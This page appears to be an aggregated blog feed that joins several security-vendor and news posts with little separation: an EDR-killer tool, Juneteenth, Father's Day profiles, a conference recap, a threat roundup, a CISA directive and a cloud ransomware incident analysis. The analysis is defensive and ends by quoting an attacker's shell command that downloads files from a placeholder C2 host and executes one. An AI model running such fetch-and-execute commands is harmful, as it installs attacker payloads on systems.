A Russian-speaking hacker has been making headlines recently after promoting a tool that the threat actor claims can bypass EDR and AV tools. The so-called ‘Terminator’ tool is said to be able to kill processes belonging to “all AVs/EDRs/XDRs”, which if used in conjunction with other malware, could allow threat actors to breach defenses. SentinelOne customers are protected from the Terminator EDR tool.
In this post, we take a look at how the tool works and how organizations can stay protected from it.
What is Terminator EDR Killer?
Late last month, a threat actor using the pseudonym “Spyboy” began promoting a malicious tool for sale on a Russian hacking platform, offering the tool for sale at prices ranging between $300 for a specific AV bypass and $3000 for a so-called “all-in-one” EDR killer.
The threat actor’s videos demonstrating the tools on Sophos and CrowdStrike solutions were widely shared across social media, raising concerns among enterprise security teams that their organizations were at risk.
How the Terminator Tool Works
Terminator utilizes the Bring Your Own Vulnerable Driver (BYOVD) attack technique, which involves threat actors deploying drivers that are legitimately signed and can be successfully loaded into Windows systems.
However, these drivers have vulnerabilities that grant attackers the ability to execute attacker-provided code in kernel context. This puts the attackers in a privileged position, enabling them to circumvent the limitations imposed by the operating system on user processes. The consistent use of the BYOVD technique by threat actors has been observed over the past several years, leading to heightened awareness within the information security community regarding its existence and implications.
Terminator uses the BYOVD technique by deploying and loading vulnerableversions of Zemana anti-malware kerneldrivers. This enables the execution of attacker-provided malicious code in kernel mode, thereby granting attackers the capability to terminate any system or user processes, including those associated with detection mechanisms.
SentinelOne Customers Protected
The SentinelOne Agent detects the execution of known Terminator samples, and we continue to monitor this malware family closely.
Organizations not protected by SentinelOne are advised to review the indicators of compromise below.
A day for celebration and remembrance, Juneteenth commemorates the symbolic end of slavery in the United States. As a co-lead of the BLK@SentinelOne Inclusion Network, I am proud to help sponsor awareness and educational events that help all Sentinels understand the importance of this holiday in the fight for equality and equity that continues to this day.
Black American History
When President Abraham Lincoln officially ended slavery with the Emancipation Proclamation on January 1, 1863, many black Americans remained enslaved. True enforcement took time to spread deep into Confederate states. Texas was the western-most state of the Confederacy and took the longest to enforce the mandate.
On June 19, 1865, federal troops arrived in Galveston Bay, Texas to establish Union authority and ensure that the 250K enslaved black people were given their freedom. The day was celebrated one year later by the freed people as “Jubilee Day,” and later became known as Juneteenth. In December of 1865, the 13th Amendment was passed, officially abolishing slavery in America.
Texas became the first state to recognize Juneteenth as a holiday on June 7, 1979. Over 40 years later, it became a US federal holiday in 2021. I look forward to the day when Juneteenth celebrations are on the same level of holidays like President’s Day, Memorial Day, Veteran’s Day, and Independence Day. Consider this for just a moment – on July 4, 1776, the day that marks our nation’s independence, black Americans would wait upwards of 90 more years for freedom.
Similar to those revered holidays, the recognition and acknowledgement of Juneteenth is important. It is a key part of social justice history, and I am glad the decades of struggles are finally being acknowledged. The 14th Amendment gave black people the right to vote – but that was not even truly realized until 1964 when the 24th Amendment eliminated the “poll tax”; an effort led by Dr. Martin Luther King. Making voting accessible for all represented another step to true equality. I hope more people choose to participate in educational and awareness events and learn more about this critical movement in American history.
New Traditions
A few years ago, my wife and I took our four daughters to New York City on Juneteenth. We were in Central Park, and we could hear the musical celebration in Harlem, and we made our way there to join! Now that Juneteenth is a national holiday, I hope that more cities will embrace the celebration and create new traditions to mark this important day.
While rejoicing in how far we have come as a nation, we must acknowledge how far we need to go to realize true equity. That begins with education and awareness. In order to combat systemic racism, we need to continue the dialogue on long-standing historical treatment of black Americans.
I am proud to work for a company that not only embraces Juneteenth by giving us the day off, but also embraces the many cultures and ethnicities represented in our teams across the globe. We are valued for who we are and for the unique skill sets that we bring to the table. We strive to create a workplace that is diverse, equitable, and inclusive, where people can fulfill their potential. This philosophy is central to all our people, practices, and culture across the globe.
The Home of the Brave
America is a true melting pot of a nation. From the Native Americans who helped the Pilgrims survive the winter, the French who played a role in the American Revolution and the development of the country, the Italians and Irish who passed through Ellis Island, and the Chinese who helped our country expand west and build the railroads, all faced hardships to varying extents as they became part of the fabric of this nation. We see evidence of this in the foods we eat, movies we watch, traditions we adore, and holidays we celebrate.
American culture is a beautiful blend of many, including the black experience. African Americans played an instrumental role in the development of America with more than our fair share of trials and tribulations. Black culture is an integral part of pop culture – and that now includes the federal observance of Juneteenth.
OneSentinel
Our core values drive everything we do at SentinelOne. The value that resonates with me most is OneSentinel, embodying the passion we all have about driving team success and collaboration. We can only be our best when we innovate together. I encourage my teammates at SentinelOne to use this Juneteenth as a moment to watch, listen, and learn. Together, we will build a better workplace and world!
Watch, Listen & Learn More About Juneteenth
Here is sampling of media and literary resources covering the history, significance, and celebration of both black culture and Juneteenth.
A typical workday for a father looks much different today than it did a few years ago. During quarantines across the globe that began in Spring of 2020, many parents got more family time as a result of the pandemic while working from home. Fathers became more involved with household labor and homeschooling – and many are still enjoying this division of labor and love.
According to a recently released analysis based on a continuing survey of parents living with opposite-sex partners, 20% of fathers have continued to do more child care than in pre-pandemic days, and 25% do more household chores. To celebrate this year’s Father’s Day, we checked in with our amazing Sentinel Dads around the globe to learn more about their family and see how they best achieve a work-life blend.
Meet Petr Cyhelsky, Manager, Performance Validation
Petr joined SentinelOne almost two years ago and manages a team of Engineers across the Czech Republic. His A-Team includes Anastazie (8), Antonie (5), Amelie (3), and Albert (6 mo). Petr said being a father makes him a more conscious and thoughtful manager to his team.
“I fully understand and respect their need for work-life balance,” said Petr. “When people are able to fulfill the responsibilities in their personal life, they are more productive while working.”
In return, Petr felt very supported after the birth of his fourth child with Gender-Neutral Parental Leave. Any Sentinel who welcomes a new child into the family, regardless of gender or birthing status, receives 16 weeks of fully paid parental leave and two weeks of part-time work to ease the transition.
“The luxury of having such a long parental leave is something I am very grateful for,” said Petr. “Thanks to this incredible support I was able to fully support my wife after our son was born.
Petr works remotely, and enjoys one day a week in the office for face-to-face connection. He enjoys cooking for the kids and helping to take care of his home.
“I take care of all the garden work, heating, and house maintenance,” said Petr. “I do a lot of cooking and homework with kids. I also sort recyclables and manage the trash, including the composting.”
Being a father has taught Petr to think carefully about how his actions are perceived by others.
“I try to communicate with full transparency,” said Petr. “Even small things like assuming somebody has a similar understanding of some topic can skew the whole meaning of a conversation.”
Petr’s advice to other working dads is simple – don’t sweat the small stuff!
“Don’t wreck your brain about every little problem,” said Petr. “Your kids will just easily grow out of most of them.”
Meet Dhruv Mehra, India Controller, International Accounting
Dhruv has been a father for 12 years to his lovely daughter, Hannya. He describes her birth as truly life-changing.
“Hannya teaches me the deep meaning of gratitude and love,” said Dhruv. “She is a huge inspiration for me to work even harder to advance my career.”
Dhruv is grateful for the work culture at SentinelOne that enables him to be fully dedicated to fatherhood.
“Work-life balance is not just a phrase here,” said Dhruv. “It’s a real thing. We are supported by an amazing culture and leaders with strong family ethics.”
Dhruv embraces this balance between work and family and encourages other Dads on the team to do the same.
“As a working dad, you understand the true value of time and importance of being emotionally available to your family,” said Dhruv. “A balance is the key to professional and personal success.”
Dhruv works remotely, enjoying this flexibility to be very active in his daughter’s life and the division of household labor.
“I help my daughter get ready for school each morning,” said Dhruv. “In the evening when my wife, Princey, returns home, Hannya and I welcome her with hot food and huge smiles.”
Dhruv’s advice to other dads is to enjoy every moment.
“Children bring such great joy,” said Dhruv. “Work adds purpose and pride. Both are so important in a well-balanced existence!”
Meet Graeme Jenkins, Enterprise Sales, District Manager
Based out of the UK, Graeme is kept busy by his three sons, Sebastian (9), Harrison (6), and George (4). Graeme describes his children as the “why” behind all that he does.
“Family is everything,” said Graeme. “SentinelOne gives me the trust and freedom to work around my kids, which is incredibly important to me. Being there for my kids is my lifelong career.”
Graeme loves helping care for his children, including drop off and pick up!
“I feel very comfortable helping with the school run,” said Graeme. “My stress levels decrease knowing that I’ve helped out and gives me a break from screen time, which improves the quality of my work and well being.”
The imagination and creativity Graeme sees in his kids encourages him to be more collaborative. They inspire him to share his opinion and listen carefully to his teammates’ opinions as well.
“There was cable work on my street and the workers sprayed these markers,” said Graeme. “I thought nothing of it, but my youngest said, ‘Look at all the dragonflies daddy!’”
Graeme’s advice to other working fathers is to never miss an important family event for work.
“Take as many pictures as possible,” said Graeme. “Break the hard drive, max your storage! They grow too quickly. Leave the stresses of work at work and enjoy playtime outside as much as possible – that’s what kids remember!”
Doug’s family recently became a party of five with the birth of his daughter. For him, the best part of welcoming Leah is watching his older kids, Logan (6) and Dylan (4) shower the baby with love and care.
“Having three kids is amazing chaos,” said Doug. “The gap between the second and third helps. The coolest part is watching their relationship form. My daughter Logan has so much empathy for the baby, and my son Dylan wants to help and show her off to his friends.”
Prior to joining SentinelOne 3 years ago, Doug worked at a large bank, often arriving at his office by 4am and not returning home until 7pm.
“I can’t imagine life in an office again,” said Doug. “Now I get to see them during the day and help with rides to school. That’s something that I never imagined I could do with my career.”
Doug’s key to time management is a balanced schedule. Each night he reviews the upcoming day with his wife Lally, who runs her own event planning business.
“Now that I don’t commute, I repurpose drive time,” said Doug. “We don’t live close to family, so my amazing wife and I divide and conquer. Thankfully, our schedules are opposite, and we have a nice tag team effect.”
Doug grew up on the East Coast as the middle brother of three boys. He cherished time on the weekend playing sports with his Dad’s support.
“The world was so different then,” said Doug. “My Dad came home for dinner, and we had fun on the weekends together. I feel fortunate that remote work allows me to be a hands-on Dad during the weekdays.
Doug is using his parental leave this summer with flexibility, allowing him to support his team during the busy times of quarter close and earnings reports while supporting his growing family. When asked what advice he would give his younger self as a veteran Dad now, he had to search for a moment.
“I wouldn’t do much differently,” said Doug. “I love this journey of fatherhood, and it was so different each time. Being a Dad has taught me the importance of communication and collaboration. Maybe I’d tell myself to take everything a little easier. With kids, you can’t control everything.”
Happy Father’s Day from SentinelOne!
Whether we are Securing Tomorrow to prevent tomorrow’s threats today, or supporting our employees as they raise the next generation of empathetic thinkers and innovative doers, SentinelOne is proud to keep our focus on the future that ‘tomorrow’ holds. We wish the Dads of SentinelOne a very happy Father’s Day and look forward to growing our culture rooted in community, relentlessness, and trust.
Learn more about the award-winning culture and open job opportunities on our Careers page.
https://phxtechsol.com/wp-content/uploads/2023/06/Celebrating-Fathers-of-SentinelOne.jpg6281200Phoenix Technologyhttps://phxtechsol.com/wp-content/uploads/2017/02/PTS-Horiz-logo-1-1200-300x53.jpgPhoenix Technology2023-06-18 06:49:222023-06-18 06:49:29Celebrating Fathers of SentinelOne
Each year, Amazon Web Services’s re:Inforce event serves as a reminder to the cyber defense community of the importance of organizational security. Over the past two days, AWS brought together many security leaders to share industry best practices and the latest in cloud security technology.
As security teams face challenges presented by the dynamic nature of the cloud surface, SentinelOne reaffirms its goal of providing speed, scale, and flexibility to enterprises without compromising agility or availability. The SentinelOne team brought this energy to this year’s AWS re:Inforce event at California’s Anaheim Convention Center and to the thousands of others in attendance, demonstrating AI-powered cloud security and Amazon Security Lake integration.
For those who couldn’t join us in person, here’s a recap of the main talking points and innovations presented by SentinelOne and AWS to advance cloud security to the next level.
Presentation Highlights | SentinelOne vs. Cloud Ransomware
Cloud ransomware has become a much discussed topic in the security community with both myths and facts surrounding its rising threat to enterprises. One misconception that has been busted is that “cloud ransomware is not a real cause for concern”. The reality? Cloud ransomware is a very real and quickly-growing threat. As more businesses move their data to the cloud, cybercriminals are honing their techniques to launch advanced attacks on this surface.
“Over the last 12 months, we’ve actually investigated over 8.5 million indicators of compromise (IOCs),” said SentinelOne Field CISO Director, Albert Caballero, in the re:Inforce Lightning Theater on the Expo Floor. “So, this is happening on a daily basis.”
In this presentation, Caballero broke down the types of cloud threats that SentinelOne sees regularly, including the actors behind the attacks, and their methods. He referenced several malware threats and toolsets such as AlienFox, “Doki” malware and container escapes, and IceFire ransomware; all investigated by the SentinelLabs and Vigilance MDR teams.
“It’s no longer that malware only targets Windows, but it’s actually moving towards Linux, Docker, and container environments.”
Caballero explained that the role of MDR in a cloud environment is a critical one, enhancing a SOC teams’ ability to react quickly and contain cloud-based threats.
Using SentinelOne’s Vigilance MDR, security professionals can centralize incoming alerts and telemetry in a highly performant backend data lake which uses the power of AI to automate correlations across hybrid environments. Learn more about how SentinelOne can support the speed and accuracy needed to defend your cloud environments here.
Presentation Highlights | Real-Time Identification & Remediation in Ransomware Attacks
Cloud-centric attacks are rising fueled by mass digital transformations and the challenge of architecting a cloud security framework. Today, 60% of the world’s corporate data is stored in the public cloud and 80% of companies have experienced at least one cloud security incident in the last year alone.
“There’s an interesting change that seems to be occurring: Attackers are following the money,” said SentinelOne’s Jeremy “Howie” Howerton, Cloud Technical Leader, in a presentation to start Day 2 of re:Inforce. “They’re figuring out that Linux systems and actual cloud systems are where most data these days are being housed.”
Building robust and effective cloud security takes more than just proper configuration and daily scanning though. While AWS ensures the cloud itself is secure and having a well-defined Cloud Shared Responsibility Model does much to improve overall cloud security posture, targeted attacks against cloud environments require another layer of security.
Howerton explained that when it comes to cloud-based ransomware attacks, lateral movement and exfiltration can happen in minutes and cause critical damage. Using a demo showing how SentinelOne blocks a DarkRadiation ransomware attack, Howie proved the value of having real-time, at runtime detection and response and how it augments best practices for workload protection and cloud threat hunting.
SentinelOne at AWS Security LIVE!
In an AWS Security LIVE! broadcast on Twitch, SentinelOne Field CISO Albert Caballero was asked by hosts Ryan Orsi and Temi Adebambo about Purple AI, a first-of-its-kind generative AI tool for SOC teams and threat hunters, first announced in April at this year’s RSA Security Conference in San Francisco.
AI is, no doubt, one of the most disruptive technologies of our time. While cybercriminals are leveraging generative AI to execute malicious attacks that can take down companies and governments, SentinelOne uses the power of AI as a force for good.
“AI is scary for a lot of people, but the reality is that it’s just another tool in our arsenal. The hackers are using it – the defenders need to use it,” said Caballero during the livestream. “It’s just something that if we don’t leverage, then we’re just going to fall behind and the cat-and-mouse game chase starts all over again.”
Purple AI uses a variety of open source and proprietary models to arm security analysts with an engine that identifies, analyzes, and mitigates threats using conversational prompts and an interactive dialog. With Purple AI on hand, analysts can shave down hours of research and queries and, instead, get rapid, accurate and detailed responses to any question, in any language.
“What [Purple AI] will do is, not only perform that query on your backend and give you those results, but also give you some recommended actions and build out the actual query syntax for you,” said Cabellero, a veteran security leader who has held previous positions in divisions of Warner Bros., HBO, and Verizon Business. “When I first saw this, I was like, ‘Man, if only I had that when I ran a SOC 10 years ago.’”
A first-of-its-kind offering, Purple AI is designed from the ground up to accelerate threat hunting capabilities. It seamlessly fuses together real-time, embedded neural networks and a large language model (LLM)-based natural language interface to help security teams monitor and operate all security data and boost their productivity and scale their operations.
“That’s something that allows us to elevate the SOC analysts, especially those new to the SOC that typically would have to escalate a ticket to a level two,” continued Caballero. “They can perform a lot more triage, a lot more analysis, without necessarily understanding how to query the backend.”
In addition to discussing Purple AI, Caballero also talked about investing in real-time, agent-based protection to help build operational resilience.
“It’s important to understand where the threats are and tackle them where they are. The threats are at the operating-system level, they are at layer seven, they are at the application layer,” said Caballero. “You run Kubernetes, you run Docker, you run anything, you need an agent on those containers.” You can tune into the full conversation here.
GA Announcement | SentinelOne’s Integration with Amazon Security Lake to Power Cloud Investigations
Following AWS’s announcement two weeks ago of its general availability for Amazon Security Lake, AWS CISO, CJ Moses, emphasized its importance onstage at re:Inforce. SentinelOne is a proud launch partner for Amazon Security Lake.
“This streamlined process greatly reduces complexity and enhances efficiency in threat investigations, enabling a unified data source that automatically correlates events, empowering automated correlation of events to reconstruct threats from inception to resolution,” said SentinelOne’s SVP of Product Management, Jane Wong.
Following this GA release, security teams can now bring Amazon Security Lake telemetry into the SentinelOne Singularity platform. This allows joint customers to automatically ingest the Amazon Security Lake telemetry, search and analyze within the Singularity platform, and leverage SentinelOne’s correlation and automation capabilities. Learn more here.
Closing Thoughts On re:Inforce 2023
Whether on the re:Inforce Expo Floor, in theater presentations, web broadcasts, or at customer meetings, the SentinelOne team emphasized the importance of securing the cloud in real-time, the winning combination of automation and managed detection and response (MDR), and the strength of partnerships with AWS, Wiz, Red Canary, and others.
The past two days served as a reminder of the good work cyber defenders are doing to keep everyone safe in the cloud. Events like re:Inforce keep us together and show how important it is to continue the conversations around cloud security best practices and cyber innovation. Thank you to AWS for a memorable conference – we look forward to more chances to collaborate with fellow vendors and attendees!
Contact us to learn more about SentinelOne’s cloud security offerings and how we can help you improve your cloud security strategy through a combination of endpoint detection and response (EDR) capability, autonomous threat hunting, and runtime solutions.
Singularity Cloud
One home to secure VMs, servers, containers, and Kubernetes clusters across multi-cloud and datacenters. Prevent, detect, investigate, and respond to threats in the cloud in real time—without sacrificing performance.
The Good | Bulletproof Hosting Operator Enabling Major Crimeware Convicted
A Romanian national was sentenced this week to three years in prison for running a bulletproof hosting service used by cybercriminals in various cyberattack operations. Mihai Ionut Paunescu, also known online as “Virus”, has been charged with conspiracy to commit computer intrusion for his involvement enabling a variety of cybercrimes from DDoS and spam-based attacks to info-stealers and banking malware.
Bulletproof hosting services enable cybercriminals to spread malware focused on stealing confidential information. These sites are unlawfully lenient about what material they allow their users to upload and are strategically located outside law enforcement jurisdictions, giving criminals the anonymity needed to host malware kits, data stashes, hidden dark markets, and more.
In a statement by the DoJ, Paunescu’s bulletproof hosting service played an intrinsic role in distributing some of the world’s most harmful malware including the Gozi virus, Zeus trojan, SpyEye trojan, and BlackEnergy malware. These are notorious names in the infosec world. Gozi, for example, is said to have infected more than a million systems, stealing banking information and passwords from government entities and businesses globally.
Court documents say that Paunescu was well-aware of the illegal doings of his criminal customer base. Not only did he shield paying customers from law enforcement groups by renting IP addresses from legitimate internet service providers (ISPs), he also provided C2 infrastructure for botnet operations and proxies to hide malicious traffic. Paunescu also monitored IP address spam lists for those under his control to stop them from being blocked and maintained a database of all rented servers – many of which were attached to known malware.
Paunescu has pleaded guilty to all charges and ordered to forfeit $3,510,000 and pay $18,945 in restitution and will face another three years of supervision after serving his term in prison.
The Bad | Critical RCE Flaw In Fortinet SSL VPN Opens the Door to Further Attacks
After releasing a patch for a critical remote code execution (RCE) vulnerability in its FortiOS SSL VPN, Fortinet is now warning customers that the flaw may have been exploited in emerging attacks on government and critical infrastructure entities. The flaw, tracked as CVE-2023-27997, is described as a heap-based buffer overflow weakness in both the FortiOS and FortiProxy SSL VPN that could allow threat actors to gain RCE through malicious requests.
Fortinet’s latest report on the flaw found that one issue tracked as FG-IR-23-097 was likely to have been exploited in a number of cases and that the company was working closely with its customers to monitor the developing situation. Fortinet also touched on the possibility that the Chinese-based threat actors linked to the recent Volt Typhoon attacks could have their eyes set on the CVE-2023-27997 flaw. No confirmed link has been made between the two at the time of this writing, but the company does expect any unpatched vulnerabilities to continue facing exploitation in popular software and devices. Fortinet urges all its customers to continue prioritizing patching immediately upon release.
Confirmed: Volt Typhoon used an auth bypass CVE-2022-40684 in FortiOS products for initial access
Unconfirmed: If Volt Typhoon used the new CVE-2023-27997 in SSL VPNs – but Fortinet expects many threat actors, including Volt Typhoon, may have a go at ithttps://t.co/y9Dlbjw9dYhttps://t.co/tbZDOfDGHU
Due to their internet-facing nature and access to enterprise intranets, SSL VPNs continue to be a lucrative target for threat actors. Pre-authentication flaws such as CVE-2023-27997 are especially valuable to actors since they bypass the need for valid credentials. Additionally to following stringent patch management processes, organizations can proactively protect themselves against new vulnerabilities by implementing zero trust policies and advanced security solutions such as EDR and XDR.
The Ugly | BatCloak Obfuscation Tool Evading Static Antivirus Engines
Security researchers this week warn the community about an obfuscation tool called “BatCloak” allowing actors to deliver malicious code under the guise of batch (.BAT) files. Having a high success rate, tools that leverage the BatCloak component have become increasingly popular amongst threat actors of all skill levels for its ease of use.
BatCloak is currently promoted as “fully undetectable malware”, or “FUD”, by its authors. FUD status is supposed to signify to buyers that the malware is sophisticated enough to remain completely undetectable in compromised systems. Slipping past legacy AV detection suites, FUD malware allows threat actors to carry out a variety of malicious activities. Though tools of this nature are tuned to evade static detection engines, they are readily detectable by modern behavioral and AI-powered solutions like SentinelOne.
According to the latest research on BatCloak, the tool is said to demonstrate a remarkable ability to persistently avoid static detection. Samples going back to 2022 show that, through BatCloak, threat actors have been able to load numerous malware families and exploits easily with highly obfuscated batch files.
BAT files are text files that contain a sequence of commands used to run legitimate Windows-based applications and routines. Cybercriminals can exploit BAT files to execute malicious scripts and infiltrate vulnerable networks and systems. Since BAT files are extremely variable, they pose a regular challenge for antivirus engines. In fact, many static detection engines do not scan BAT files. If crafted using obfuscation techniques, these files can be difficult for traditional antivirus software to detect. In environments with robust behavioral detection technologies in place, however, they pose no threat.
Tools like Jlaive Crypter, Madera, ScrubCrypt and the like integrate tactics associated with the BatCloak engine. All these tools use various interactions of BatCloak’s feature set to process and generate uniquely obfuscated payloads. All SentinelOne customers are protected against payloads generated via Jlaive or similar BatCloak-centric obfuscation utilities.
https://phxtechsol.com/wp-content/uploads/2023/06/Mihai_Ionut_Paunescu.jpg7161276Phoenix Technologyhttps://phxtechsol.com/wp-content/uploads/2017/02/PTS-Horiz-logo-1-1200-300x53.jpgPhoenix Technology2023-06-16 06:30:212023-06-16 06:30:23The Good, the Bad and the Ugly in Cybersecurity – Week 24
The U.S. government agency in charge of improving the nation’s cybersecurity posture is ordering all federal agencies to take new measures to restrict access to Internet-exposed networking equipment. The directive comes amid a surge in attacks targeting previously unknown vulnerabilities in widely used security and networking appliances.
Under a new order from the Cybersecurity and Infrastructure Security Agency (CISA), federal agencies will have 14 days to respond to any reports from CISA about misconfigured or Internet-exposed networking equipment. The directive applies to any networking devices — such as firewalls, routers and load balancers — that allow remote authentication or administration.
The order requires federal departments to limit access so that only authorized users on an agency’s local or internal network can reach the management interfaces of these devices. CISA’s mandate follows a slew of recent incidents wherein attackers exploited zero-day flaws in popular networking products to conduct ransomware and cyber espionage attacks on victim organizations.
Earlier today, incident response firm Mandiantrevealed that since at least October 2022, Chinese cyber spies have been exploiting a zero-day vulnerability in many email security gateway (ESG) appliances sold by California-based Barracuda Networks to hoover up email from organizations using these devices.
Barracuda was alerted to the exploitation of a zero-day in its products in mid-May, and two days later the company pushed a security update to address the flaw in all affected devices. But last week, Barracuda took the highly unusual step of offering to replace compromised ESGs, evidently in response to malware that altered the systems in such a fundamental way that they could no longer be secured remotely with software updates.
According to Mandiant, a previously unidentified Chinese hacking group was responsible for exploiting the Barracuda flaw, and appeared to be searching through victim organization email records for accounts “belonging to individuals working for a government with political or strategic interest to [China] while this victim government was participating in high-level, diplomatic meetings with other countries.”
When security experts began raising the alarm about a possible zero-day in Barracuda’s products, the Chinese hacking group altered their tactics, techniques and procedures (TTPs) in response to Barracuda’s efforts to contain and remediate the incident, Mandiant found.
Mandiant said the attackers will continue to change their tactics and malware, “especially as network defenders continue to take action against this adversary and their activity is further exposed by the infosec community.”
Meanwhile, this week we learned more details about the ongoing exploitation of a zero-day flaw in a broad range of virtual private networking (VPN) products made by Fortinet — devices many organizations rely on to facilitate remote network access for employees.
On June 11, Fortinet released a half-dozen security updates for its FortiOS firmware, including a weakness that researchers said allows an attacker to run malware on virtually any Fortinet SSL VPN appliance. The researchers found that just being able to reach the management interface for a vulnerable Fortinet SSL VPN appliance was enough to completely compromise the devices.
“This is reachable pre-authentication, on every SSL VPN appliance,” French vulnerability researcher Charles Fol tweeted. “Patch your #Fortigate.”
Shodan.io, the search engine made for finding Internet of Things devices, reports that there are currently more than a half-million vulnerable Fortinet devices reachable via the public Internet.
The new cybersecurity directive from CISA orders agencies to remove any networking device management interfaces from the internet by making them only accessible from an internal enterprise network (CISA recommends an isolated management network). CISA also says agencies should “deploy capabilities, as part of a Zero Trust Architecture, that enforce access control to the interface through a policy enforcement point separate from the interface itself (preferred action).”
Security experts say CISA’s directive highlights the reality that cyberspies and ransomware gangs are making it increasingly risky for organizations to expose any devices to the public Internet, because these groups have strong incentives to probe such devices for previously unknown security vulnerabilities.
The most glaring example of this dynamic can be seen in the frequency with which ransomware groups have discovered and pounced on zero-day flaws in widely-used file-transfer protocol (FTP) applications. One ransomware gang in particular — Cl0p — has repeatedly exploited zero day bugs in various FTP appliances to extort tens of millions of dollars from hundreds of ransomware victims.
On February 2, KrebsOnSecurity broke the news that attackers were exploiting a zero-day vulnerability in the GoAnywhere FTP appliance by Fortra. By the time security updates were available to fix the vulnerability, Cl0p had already used it to steal data from more than a hundred organizations running Fortra’s FTP appliance.
According to CISA, on May 27, Cl0p began exploiting a previously unknown flaw in MOVEit Transfer, a popular Internet-facing file transfer application. MOVEit parent Progress Software has since released security updates to address the weakness, but Cl0p claims to have already used it to compromise hundreds of victim organizations. TechCrunch has been tracking the fallout from victim organizations, which range from banks and insurance providers to universities and healthcare entities.
The always on-point weekly security news podcast Risky Business has recently been urging organizations to jettison any and all FTP appliances, noting that Cl0p (or another crime gang) is likely to visit the same treatment on other FTP appliance vendors.
But that sound advice doesn’t exactly scale for mid-tier networking devices like Barracuda ESGs or Fortinet SSL VPNs, which are particularly prominent in small to mid-sized organizations.
“It’s not like FTP services, you can’t tell an enterprise [to] turn off the VPN [because] the productivity hit of disconnecting the VPN is terminal, it’s a non-starter,” Risky Business co-host Adam Boileau said on this week’s show. “So how to mitigate the impact of having to use a domain-joined network appliance at the edge of your network that is going to get zero-day in it? There’s no good answer.”
Risky Business founder Patrick Gray said the COVID-19 pandemic breathed new life into entire classes of networking appliances that rely on code which was never designed with today’s threat models in mind.
“In the years leading up to the pandemic, the push towards identity-aware proxies and zero trust everything and moving away from this type of equipment was gradual, but it was happening,” Gray said. “And then COVID-19 hit and everybody had to go work from home, and there really was one option to get going quickly — which was to deploy VPN concentrators with enterprise features.”
Gray said the security industry had been focused on building the next generation of remote access tools that are more security-hardened, but when the pandemic hit organizations scrambled to cobble together whatever they could.
“The only stuff available in the market was all this old crap that is not QA’d properly, and every time you shake them CVEs fall out,” Gray remarked, calling the pandemic, “a shot in the arm” to companies like Fortinet and Barracuda.
“They sold so many VPNs through the pandemic and this is the hangover,” Gray said. “COVID-19 extended the life of these companies and technologies, and that’s unfortunate.”
https://phxtechsol.com/wp-content/uploads/2017/02/PTS-Horiz-logo-1-1200-300x53.jpg00Phoenix Technologyhttps://phxtechsol.com/wp-content/uploads/2017/02/PTS-Horiz-logo-1-1200-300x53.jpgPhoenix Technology2023-06-16 05:53:052023-06-16 05:53:11CISA Order Highlights Persistent Risk at Network Edge
Cloud computing has fundamentally transformed how modern businesses interact with their data. Having enabled enterprises of all sizes and industries with both freedom and flexibility for the past two decades, cloud technology and services are now a key competitive advantage for many.
In the Cloud Computing Statistics Report by G2, numbers show the steady ascend for cloud-first operations. By 2025, 85% of organizations will be cloud-based and hold over 60% of all corporate data in at least one public or private cloud. These mass waves of cloud adoption have also introduced higher financial stakes. In 2022 alone, cloud technologies represented approximately 25% of the $919 billion spent by enterprises globally.
Given these high financial stakes, data processed and stored on cloud infrastructure has been placed squarely in the crosshairs of financially motivated and technically astute threat actors. In this blog post, we dissect a cloud ransomware incident observed in March 2023 by the team behind SentinelOne’s Vigilance MDR service. At the root of this incident was a vulnerable web application running on a public internet-facing Linux server. Through such retrospective analysis and shared findings, organizations can better steel their cloud defenses against such opportunistic attacks.
Publicly Exposed Cloud Infrastructure
In today’s world where remote work is common and businesses work globally over the internet, sharing information digitally has become required. Whether between employees, vendors, partners, or customers, the core of business operations is allowing people to access and share information. Cloud technologies and apps serve these needs by augmenting communication, collaboration, and innovation across user groups. While clouds have benefited operational workflows, they have also opened doors to cloud-based attacks. Three of the most common causes of a cloud security incident are misconfigurations, compromised credentials, and vulnerable web applications.
In this incident, a digital-native business was compromised through a vulnerability in their file sharing server. This business hosted a Linux-based file-sharing server in a public cloud provider, and exposed that file-share to the public internet. It’s important to note that there is nothing inherently bad about this architecture. Customers, third party vendors, and remote employees need to access this file-sharing server, and so it may be required to be publicly accessible. Again, file sharing helps run the business.
Organizations that follow a similar cloud model can proactively reduce the risk of that server. While a cloud security posture management (CSPM) solution would likely issue an alert and flag the server as publicly accessible, SecOps would clear the alert and mark an exception, because this architecture is fully intentional.
Another preventative best practice is assessing all software for vulnerabilities to ensure teams don’t operationalize known-vulnerable software. With over 25,000 new vulnerabilities reported in 2022 though, it’s highly likely that software that was not vulnerable when originally deployed, but became vulnerable afterwards.
Initial Compromise
When cloud resources are publicly accessible, they come under scrutiny from threat actors. This scrutiny is fully automated and runs at internet-scale and machine-speed. As attackers programmatically probe internet-facing resources, they will inevitably find vulnerabilities and, therefore, their victims.
CVE-2022-47986 is a critical-level input deserialization vulnerability affecting popular software applications. In this case, the vulnerability affected the IBM Aspera Faspex file sharing app running on the victim server. The vulnerability allows an attacker to remotely execute arbitrary code on affected systems, resulting in a complete compromise of the system. This remote code execution (RCE) is caused by improper input validation in the affected software, which allows an attacker to inject malicious code into the system. In our example, the CVE exploits a bug in the IBM Aspera Faspex file sharing software handling of YAML deserialization. This is a common scenario showing why input deserialization was once listed in the OWASP Top 10 AppSec risks.
Input deserialization occurs when user-controllable data is deserialized by a website or application. This potentially enables an attacker to manipulate serialized objects in order to pass harmful data into the application code. More damningly, this specific exploit occurs pre-authentication. With all of these factors in combination, a pre-authentication RCE vulnerability for a common application running on a publicly accessible cloud resource, the sum result led to a particularly attractive scenario for attackers. An exploit for this CVE was quickly put in play, and as programmatic threat actors ran their automated internet scans, they inevitably found the victim’s server.
Initial Access
Once identified as the target, the attacker’s first action was to gain access to the vulnerable Linux server. Attackers did so by sending a specially crafted obsolete API call and executing arbitrary code: the attackers ran a reverse shell from the victim host back to attacker-controlled infrastructure.
A reverse shell is a normal shell (i.e., terminal) process on a system, but instead of being controlled locally, it routes its input/output to a TCP socket and out to a remote system. There are legitimate uses of a remote shell, such as for remote maintenance, but it can also be used maliciously by an attacker. It appears that this reverse shell was done automatically, so that the attack could operate at machine speed. This gave the attackers a higher possibility of success in their initial access.
Encryption
With a foothold established on the victim’s Linux file server, the attacker ran the following command:
sh -c rm - f demo iFire &&
wget hxxp[://]C2_ADDRESS/demo &&
wget hxxp[://]C2_ADDRESS/iFire &&
chmod +x demo &&
./demo
